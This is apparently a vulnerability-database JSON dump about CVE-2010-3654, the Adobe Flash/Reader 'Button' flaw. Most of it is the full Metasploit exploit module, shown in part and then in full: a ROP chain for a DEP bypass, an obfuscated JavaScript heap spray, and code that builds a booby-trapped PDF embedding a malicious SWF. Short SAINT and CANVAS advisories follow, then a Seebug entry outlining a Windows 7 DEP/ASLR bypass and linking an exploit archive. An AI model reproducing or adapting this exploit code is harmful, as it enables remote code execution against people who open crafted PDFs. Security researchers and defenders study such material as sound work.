Rex::Text.to_unescape(payload_buf)\n\n js = %Q|\nvar #{var_unescape} = unescape;\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" );\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\n#{var_b} = #{var_c}.substring(0, 
(0x0c0c-0x24)/2);\n#{var_b} += #{var_shellcode};\n#{var_b} += #{var_c};\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\nvar #{var_4} = new Array();\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\";\n|\n\n js\n end\n\n def random_non_ascii_string(count)\n result = \"\"\n count.times do\n result << (rand(128) + 128).chr\n end\n result\n end\n\n def io_def(id)\n \"%d 0 obj\\n\" % id\n end\n\n def io_ref(id)\n \"%d 0 R\" % id\n end\n\n\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\n def n_obfu(str)\n result = \"\"\n str.scan(/./u) do |c|\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\n result << \"#%x\" % c.unpack(\"C*\")[0]\n else\n result << c\n end\n end\n result\n end\n\n\n def ascii_hex_whitespace_encode(str)\n result = \"\"\n whitespace = \"\"\n str.each_byte do |b|\n result << whitespace << \"%02x\" % b\n whitespace = \" \" * (rand(3) + 1)\n end\n result << \">\"\n end\n\n\n def make_pdf(swf, js)\n\n swf_name = rand_text_alpha(8 + rand(8)) + \".swf\"\n\n xref = []\n eol = \"\\n\"\n endobj = \"endobj\" << eol\n\n # Randomize PDF version?\n pdf = \"%PDF-1.5\" << eol\n #pdf << \"%\" << random_non_ascii_string(4) << eol\n\n # catalog\n xref << pdf.length\n pdf << io_def(1) << n_obfu(\"<</Type/Catalog\")\n pdf << n_obfu(\"/Pages \") << io_ref(3)\n pdf << n_obfu(\"/OpenAction \") << io_ref(5)\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # pages array\n xref << pdf.length\n pdf << io_def(3) << n_obfu(\"<</Type/Pages/Count 1/Kids [\") << io_ref(4) << n_obfu(\"]>>\") << eol << endobj\n\n # page 1\n xref << pdf.length\n pdf << io_def(4) << n_obfu(\"<</Type/Page/Parent \") << io_ref(3)\n pdf << n_obfu(\"/Annots [\") << io_ref(7) << n_obfu(\"] \")\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # js action\n xref << pdf.length\n pdf << io_def(5) << 
n_obfu(\"<</Type/Action/S/JavaScript/JS \") + io_ref(6) + \">>\" << eol << endobj\n\n # js stream\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))\n pdf << io_def(6) << n_obfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # swf annotation object\n xref << pdf.length\n pdf << io_def(7) << n_obfu(\"<</Type/Annot/Subtype/RichMedia\")\n pdf << n_obfu(\"/Rect [20 20 187 69] \")\n pdf << n_obfu(\"/RichMediaSettings \") << io_ref(8)\n pdf << n_obfu(\"/RichMediaContent \") << io_ref(9)\n pdf << n_obfu(\"/NM (\") << swf_name << n_obfu(\")\")\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # rich media settings\n xref << pdf.length\n pdf << io_def(8)\n pdf << n_obfu(\"<</Type/RichMediaSettings/Subtype/Flash\")\n pdf << n_obfu(\"/Activation \") << io_ref(10)\n pdf << n_obfu(\"/Deactivation \") << io_ref(11)\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # rich media content\n xref << pdf.length\n pdf << io_def(9)\n pdf << n_obfu(\"<</Type/RichMediaContent\")\n pdf << n_obfu(\"/Assets \") << io_ref(12)\n pdf << n_obfu(\"/Configurations [\") << io_ref(14) << \"]\"\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # rich media activation / deactivation\n xref << pdf.length\n pdf << io_def(10)\n pdf << n_obfu(\"<</Type/RichMediaActivation/Condition/PO>>\")\n pdf << eol << endobj\n\n xref << pdf.length\n pdf << io_def(11)\n pdf << n_obfu(\"<</Type/RichMediaDeactivation/Condition/XD>>\")\n pdf << eol << endobj\n\n # rich media assets\n xref << pdf.length\n pdf << io_def(12)\n pdf << n_obfu(\"<</Names [(#{swf_name}) \") << io_ref(13) << n_obfu(\"]>>\")\n pdf << eol << endobj\n\n # swf embeded file ref\n xref << pdf.length\n pdf << io_def(13)\n pdf << n_obfu(\"<</Type/Filespec /EF <</F \") << io_ref(16) << n_obfu(\">> /F(#{swf_name})>>\")\n pdf << eol << endobj\n\n # rich media configuration\n 
xref << pdf.length\n pdf << io_def(14)\n pdf << n_obfu(\"<</Type/RichMediaConfiguration/Subtype/Flash\")\n pdf << n_obfu(\"/Instances [\") << io_ref(15) << n_obfu(\"]>>\")\n pdf << eol << endobj\n\n # rich media isntance\n xref << pdf.length\n pdf << io_def(15)\n pdf << n_obfu(\"<</Type/RichMediaInstance/Subtype/Flash\")\n pdf << n_obfu(\"/Asset \") << io_ref(13)\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # swf stream\n # NOTE: This data is already compressed, no need to compress it again...\n xref << pdf.length\n pdf << io_def(16) << n_obfu(\"<</Type/EmbeddedFile/Length %s>>\" % swf.length) << eol\n pdf << \"stream\" << eol\n pdf << swf << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # trailing stuff\n xrefPosition = pdf.length\n pdf << \"xref\" << eol\n pdf << \"0 %d\" % (xref.length + 1) << eol\n pdf << \"0000000000 65535 f\" << eol\n xref.each do |index|\n pdf << \"%010d 00000 n\" % index << eol\n end\n\n pdf << \"trailer\" << eol\n pdf << n_obfu(\"<</Size %d/Root \" % (xref.length + 1)) << io_ref(1) << \">>\" << eol\n\n pdf << \"startxref\" << eol\n pdf << xrefPosition.to_s() << eol\n\n pdf << \"%%EOF\" << eol\n pdf\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/adobe_flashplayer_button.rb"}], "saint": [{"lastseen": "2016-10-03T15:01:59", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3654"], "description": "Added: 11/16/2010 \nCVE: [CVE-2010-3654](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3654>) \nBID: [44504](<http://www.securityfocus.com/bid/44504>) \nOSVDB: [68932](<http://www.osvdb.org/68932>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nAdobe Reader 9.x is vulnerable to a remote code execution vulnerability as a result of parsing flash content by the bundled Adobe Flash Player. 
\n\n### Resolution\n\nApply the patches referenced in [APSA10-05](<http://www.adobe.com/support/security/advisories/apsa10-05.html>) when they become available. In the interim, follow the relevant directions for mitigating the vulnerability in Adobe Reader. \n\n### References\n\n<http://www.kb.cert.org/vuls/id/298081> \n<http://secunia.com/advisories/42030/> \n\n\n### Limitations\n\nExploit works on Adobe Reader 9.4.0 and the user must open the exploit file in Adobe Reader. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2010-11-16T00:00:00", "published": "2010-11-16T00:00:00", "id": "SAINT:B5657AFB338B1DE1878BED26F331E06E", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_flash_content_parsing", "type": "saint", "title": "Adobe Flash Player Flash Content Parsing Code Execution", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:40", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3654"], "description": "Added: 11/16/2010 \nCVE: [CVE-2010-3654](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3654>) \nBID: [44504](<http://www.securityfocus.com/bid/44504>) \nOSVDB: [68932](<http://www.osvdb.org/68932>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nAdobe Reader 9.x is vulnerable to a remote code execution vulnerability as a result of parsing flash content by the bundled Adobe Flash Player. \n\n### Resolution\n\nApply the patches referenced in [APSA10-05](<http://www.adobe.com/support/security/advisories/apsa10-05.html>) when they become available. In the interim, follow the relevant directions for mitigating the vulnerability in Adobe Reader. 
\n\n### References\n\n<http://www.kb.cert.org/vuls/id/298081> \n<http://secunia.com/advisories/42030/> \n\n\n### Limitations\n\nExploit works on Adobe Reader 9.4.0 and the user must open the exploit file in Adobe Reader. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2010-11-16T00:00:00", "published": "2010-11-16T00:00:00", "id": "SAINT:0F4E1C742351171F6A7E81111D6518CC", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_flash_content_parsing", "title": "Adobe Flash Player Flash Content Parsing Code Execution", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:53", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3654"], "edition": 2, "description": "Added: 11/16/2010 \nCVE: [CVE-2010-3654](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3654>) \nBID: [44504](<http://www.securityfocus.com/bid/44504>) \nOSVDB: [68932](<http://www.osvdb.org/68932>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nAdobe Reader 9.x is vulnerable to a remote code execution vulnerability as a result of parsing flash content by the bundled Adobe Flash Player. \n\n### Resolution\n\nApply the patches referenced in [APSA10-05](<http://www.adobe.com/support/security/advisories/apsa10-05.html>) when they become available. In the interim, follow the relevant directions for mitigating the vulnerability in Adobe Reader. \n\n### References\n\n<http://www.kb.cert.org/vuls/id/298081> \n<http://secunia.com/advisories/42030/> \n\n\n### Limitations\n\nExploit works on Adobe Reader 9.4.0 and the user must open the exploit file in Adobe Reader. 
\n\n### Platforms\n\nWindows \n \n\n", "modified": "2010-11-16T00:00:00", "published": "2010-11-16T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_flash_content_parsing", "id": "SAINT:81B135AB58085F29890F2C48E7DD9175", "type": "saint", "title": "Adobe Flash Player Flash Content Parsing Code Execution", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:45", "description": "", "published": "2010-11-03T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player \"Button\" Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3654"], "modified": "2010-11-03T00:00:00", "id": "PACKETSTORM:95444", "href": "https://packetstormsecurity.com/files/95444/Adobe-Flash-Player-Button-Remote-Code-Execution.html", "sourceData": "`## \n# $Id: adobe_flashplayer_button.rb 10857 2010-11-01 22:34:13Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \nrequire 'zlib' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player \"Button\" Remote Code Execution', \n'Description' => %q{ \nThis module exploits a vulnerability in the handling of certain SWF movies \nwithin versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat \nare also vulnerable, as are any other applications that may embed Flash player. \n \nArbitrary code execution is achieved by embedding a specially crafted Flash \nmovie into a PDF document. An AcroJS heap spray is used in order to ensure \nthat the memory used by the invalid pointer issue is controlled. 
\n \nNOTE: This module uses a similar DEP bypass method to that used within the \nadobe_libtiff module. This method is unlikely to work across various \nWindows versions due a the hardcoded syscall number. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Found being openly exploited \n'Haifei Li', # PoC \n'jduck' # Metasploit version \n], \n'Version' => '$Revision: 10857 $', \n'References' => \n[ \n['CVE', '2010-3654'], \n['OSVDB', '68932'], \n['BID', '44504'], \n['URL', 'http://www.adobe.com/support/security/advisories/apsa10-05.html'], \n['URL', 'http://blog.fortinet.com/fuzz-my-life-flash-player-zero-day-vulnerability-cve-2010-3654/'], #PoC \n# For SWF->PDF embedding \n['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/'] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'InitialAutoRunScript' => 'migrate -f', \n'DisablePayloadHandler' => 'true', \n}, \n'Payload' => \n{ \n'Space' => 1000, \n'BadChars' => \"\\x00\", \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# Tested OK via Adobe Reader 9.4.0 on Windows XP SP3 (uses flash 10.1.85.3) -jjd \n[ 'Automatic', { }], \n], \n'DisclosureDate' => 'Oct 28 2010', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), \n], self.class) \nend \n \ndef exploit \nswf_data = make_swf() \njs_data = make_js(payload.encoded) \n \n# Create the pdf \npdf = make_pdf(swf_data, js_data) \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file...\") \n \nfile_create(pdf) \nend \n \ndef make_swf \n# load the static swf file \npath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"CVE-2010-3654.swf\" ) \nfd = File.open( path, \"rb\" ) \nswf_data = fd.read(fd.stat.size) \nfd.close \nswf_data \nend \n \ndef make_js(encoded_payload) \n \n# The following executes a ret2lib using BIB.dll \n# The effect is to bypass DEP and execute the shellcode in an indirect way \nstack_data = [ 
\n0xc0c0c0c, \n0x7002fe1, # mov edx,[esi+0x18] / test edx,edx / je +0x12 / mov eax,[esi+0xc] / mov ecx,[esi+4] / push eax / push ecx / push esi / call edx \n0xcccccccc, \n0xcccccccc, \n0xc0c0c0c + 0x10, \n0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret \n0xcccccccc, \n0x70048ef, # xchg eax,esp / ret \n0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8] \n0xcccccccc, \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009033, # ret 0x18 \n0x7009084, # ret \n0xc0c0c0c, \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7001599, # pop ebp / ret \n0x10124, \n0x70072f7, # pop eax / ret \n0x10104, \n0x70015bb, # pop ecx / ret \n0x1000, \n0x700154d, # mov [eax], ecx / ret \n0x70015bb, # pop ecx / ret \n0x7ffe0300, # -- location of KiFastSystemCall \n0x7007fb2, # mov eax, [ecx] / ret \n0x70015bb, # pop ecx / ret \n0x10011, \n0x700a8ac, # mov [ecx], eax / xor eax,eax / ret \n0x70015bb, # pop ecx / ret \n0x10100, \n0x700a8ac, # mov [ecx], eax / xor eax,eax / ret \n0x70072f7, # pop eax / ret \n0x10011, \n0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?) 
\n0x7005c54, # pop esi / add esp,0x14 / ret \n0xffffffff, \n0x10100, \n0x0, \n0x10104, \n0x1000, \n0x40, \n# The next bit effectively copies data from the interleaved stack to the memory \n# pointed to by eax \n# The data copied is: \n# \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83 \n# \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff \n# \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90 \n0x700d731, # mov eax, [ebp-0x24] / ret \n0x70015bb, # pop ecx / ret \n0x9054905a, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x5815eb5a, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x18891a8b, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x8304c083, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0xfb8104c2, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0xc0c0c0c, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x5ebee75, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0xffffe6e8, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x909090ff, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x90909090, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x90909090, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x90ffffff, \n0x700154d, # mov [eax], ecx / ret \n0x700d731, # mov eax, [ebp-0x24] / ret \n0x700112f # call eax -- (execute stub to transition to full shellcode) \n].pack('V*') \n \nvar_unescape = 
rand_text_alpha(rand(100) + 1) \nvar_shellcode = rand_text_alpha(rand(100) + 1) \n \nvar_start = rand_text_alpha(rand(100) + 1) \n \nvar_s = 0x10000 \nvar_c = rand_text_alpha(rand(100) + 1) \nvar_b = rand_text_alpha(rand(100) + 1) \nvar_d = rand_text_alpha(rand(100) + 1) \nvar_3 = rand_text_alpha(rand(100) + 1) \nvar_i = rand_text_alpha(rand(100) + 1) \nvar_4 = rand_text_alpha(rand(100) + 1) \n \npayload_buf = '' \npayload_buf << stack_data \npayload_buf << encoded_payload \n \nescaped_payload = Rex::Text.to_unescape(payload_buf) \n \njs = %Q| \nvar #{var_unescape} = unescape; \nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' ); \nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" ); \nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c}; \n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2); \n#{var_b} += #{var_shellcode}; \n#{var_b} += #{var_c}; \n#{var_d} = #{var_b}.substring(0, #{var_s}/2); \nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d}; \n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2); \nvar #{var_4} = new Array(); \nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\"; \n| \n \njs \nend \n \ndef RandomNonASCIIString(count) \nresult = \"\" \ncount.times do \nresult << (rand(128) + 128).chr \nend \nresult \nend \n \ndef ioDef(id) \n\"%d 0 obj\\n\" % id \nend \n \ndef ioRef(id) \n\"%d 0 R\" % id \nend \n \n \n#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ \ndef nObfu(str) \nresult = \"\" \nstr.scan(/./u) do |c| \nif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' \nresult << \"#%x\" % c.unpack(\"C*\")[0] \nelse \nresult << c \nend \nend \nresult \nend \n \n \ndef ASCIIHexWhitespaceEncode(str) \nresult = \"\" \nwhitespace = \"\" \nstr.each_byte do |b| \nresult << whitespace << \"%02x\" % b \nwhitespace = \" \" * (rand(3) + 1) \nend \nresult << \">\" \nend \n \n \ndef make_pdf(swf, js) \n \nswf_name = 
rand_text_alpha(8 + rand(8)) + \".swf\" \n \nxref = [] \neol = \"\\n\" \nendobj = \"endobj\" << eol \n \n# Randomize PDF version? \npdf = \"%PDF-1.5\" << eol \n#pdf << \"%\" << RandomNonASCIIString(4) << eol \n \n# catalog \nxref << pdf.length \npdf << ioDef(1) << nObfu(\"<</Type/Catalog\") \npdf << nObfu(\"/Pages \") << ioRef(3) \npdf << nObfu(\"/OpenAction \") << ioRef(5) \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# pages array \nxref << pdf.length \npdf << ioDef(3) << nObfu(\"<</Type/Pages/Count 1/Kids [\") << ioRef(4) << nObfu(\"]>>\") << eol << endobj \n \n# page 1 \nxref << pdf.length \npdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3) \npdf << nObfu(\"/Annots [\") << ioRef(7) << nObfu(\"] \") \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# js action \nxref << pdf.length \npdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << eol << endobj \n \n# js stream \nxref << pdf.length \ncompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) \npdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol \npdf << \"stream\" << eol \npdf << compressed << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n# swf annotation object \nxref << pdf.length \npdf << ioDef(7) << nObfu(\"<</Type/Annot/Subtype/RichMedia\") \npdf << nObfu(\"/Rect [20 20 187 69] \") \npdf << nObfu(\"/RichMediaSettings \") << ioRef(8) \npdf << nObfu(\"/RichMediaContent \") << ioRef(9) \npdf << nObfu(\"/NM (\") << swf_name << nObfu(\")\") \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# rich media settings \nxref << pdf.length \npdf << ioDef(8) \npdf << nObfu(\"<</Type/RichMediaSettings/Subtype/Flash\") \npdf << nObfu(\"/Activation \") << ioRef(10) \npdf << nObfu(\"/Deactivation \") << ioRef(11) \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# rich media content \nxref << pdf.length \npdf << ioDef(9) \npdf << nObfu(\"<</Type/RichMediaContent\") \npdf << nObfu(\"/Assets \") << 
ioRef(12) \npdf << nObfu(\"/Configurations [\") << ioRef(14) << \"]\" \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# rich media activation / deactivation \nxref << pdf.length \npdf << ioDef(10) \npdf << nObfu(\"<</Type/RichMediaActivation/Condition/PO>>\") \npdf << eol << endobj \n \nxref << pdf.length \npdf << ioDef(11) \npdf << nObfu(\"<</Type/RichMediaDeactivation/Condition/XD>>\") \npdf << eol << endobj \n \n# rich media assets \nxref << pdf.length \npdf << ioDef(12) \npdf << nObfu(\"<</Names [(#{swf_name}) \") << ioRef(13) << nObfu(\"]>>\") \npdf << eol << endobj \n \n# swf embeded file ref \nxref << pdf.length \npdf << ioDef(13) \npdf << nObfu(\"<</Type/Filespec /EF <</F \") << ioRef(16) << nObfu(\">> /F(#{swf_name})>>\") \npdf << eol << endobj \n \n# rich media configuration \nxref << pdf.length \npdf << ioDef(14) \npdf << nObfu(\"<</Type/RichMediaConfiguration/Subtype/Flash\") \npdf << nObfu(\"/Instances [\") << ioRef(15) << nObfu(\"]>>\") \npdf << eol << endobj \n \n# rich media isntance \nxref << pdf.length \npdf << ioDef(15) \npdf << nObfu(\"<</Type/RichMediaInstance/Subtype/Flash\") \npdf << nObfu(\"/Asset \") << ioRef(13) \npdf << nObfu(\">>\") \npdf << eol << endobj \n \n# swf stream \n# NOTE: This data is already compressed, no need to compress it again... 
\nxref << pdf.length \npdf << ioDef(16) << nObfu(\"<</Type/EmbeddedFile/Length %s>>\" % swf.length) << eol \npdf << \"stream\" << eol \npdf << swf << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n# trailing stuff \nxrefPosition = pdf.length \npdf << \"xref\" << eol \npdf << \"0 %d\" % (xref.length + 1) << eol \npdf << \"0000000000 65535 f\" << eol \nxref.each do |index| \npdf << \"%010d 00000 n\" % index << eol \nend \n \npdf << \"trailer\" << eol \npdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol \n \npdf << \"startxref\" << eol \npdf << xrefPosition.to_s() << eol \n \npdf << \"%%EOF\" << eol \npdf \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/95444/adobe_flashplayer_button.rb.txt"}], "canvas": [{"lastseen": "2019-05-29T17:19:23", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3654"], "description": "**Name**| adobe_flash_button \n---|--- \n**CVE**| CVE-2010-3654 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| adobe_flash_button \n**Notes**| CVE Name: CVE-2010-3654 \nVENDOR: Adobe \nNOTES: Exploitation through an PDF file is more reliable than with a \ndirect HTML/Flash exploit \nVersionsAffected: Adobe Acrobat Reader 9.4.0. 
\nRepeatability: \nReferences: http://www.adobe.com/support/security/advisories/apsa10-05.html \nDate public: 10/28/2010 \n\n", "edition": 2, "modified": "2010-10-29T19:00:00", "published": "2010-10-29T19:00:00", "id": "ADOBE_FLASH_BUTTON", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/adobe_flash_button", "type": "canvas", "title": "Immunity Canvas: ADOBE_FLASH_BUTTON", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T16:38:18", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Adobe Flash Player < 10.1.53 .64 Action Script Type Confusion Exploit (DEP+ASLR bypass)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3654"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71627", "id": "SSV:71627", "sourceData": "\n Source: http://www.abysssec.com/blog/2011/04/exploiting-adobe-flash-player-on-windows-7/\r\n\r\nAdobe Flash player Action script type confusion exploit (DEP+ASLR bypass)\r\n\r\nadvisory text : \r\n\r\nHere is another reliable windows 7 exploit . the main method used for exploitation is based on Haifei-li presentation at CanSecWest. \r\nbut as exploit code not relased and a lot of peoples like to see exploit code here is our code . \r\n\r\nexploitation detail :\r\nFor exploitation purpose on recent protections on windows 7 without any 3rd party (well flash is not 3rd party todays) , it is possible to use the same bug many times to leak the imageBase address and payload address. 
In our exploit we used three confusion to read String Objects address and accordingly imagebase address.\r\n\r\nStep1: read shellcode string object pointer by confusing it with uint and use it to leak ImageBase.\r\nStep2: leak address of the shellcode with the same pointer and NewNumber trick.\r\nStep3: send imageBase & shellcode address as parameters to the RopPayload function, develop Rop payload string and again confuse the return value with uint to read address of RopPayload string.\r\nStep4: send address of the rop payload as parameters to the last confused function that confuses string type with class object. And thus address of our rop payload will be used as vtable in the fake class object.\r\nNote: In using strings as a buffer for shellcode in action script, it is important to use alphanumeric characters because the toString method converts our ascii character set to uincode thus make our shellcode unusable.\r\n\r\nHere you can get our reliable exploit against windows 7 :\r\ncalc.exe payload\r\n\r\nhttp://www.exploit-db.com/sploits/CVE-2010-3654_Win7.zip\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71627"}, {"lastseen": "2017-11-19T13:27:45", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "type": "seebug", "title": "Adobe Flash Player \"Button\" Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3654"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-71175", "id": "SSV:71175", "sourceData": "\n ##\r\n# $Id: adobe_flashplayer_button.rb 10857 2010-11-01 22:34:13Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
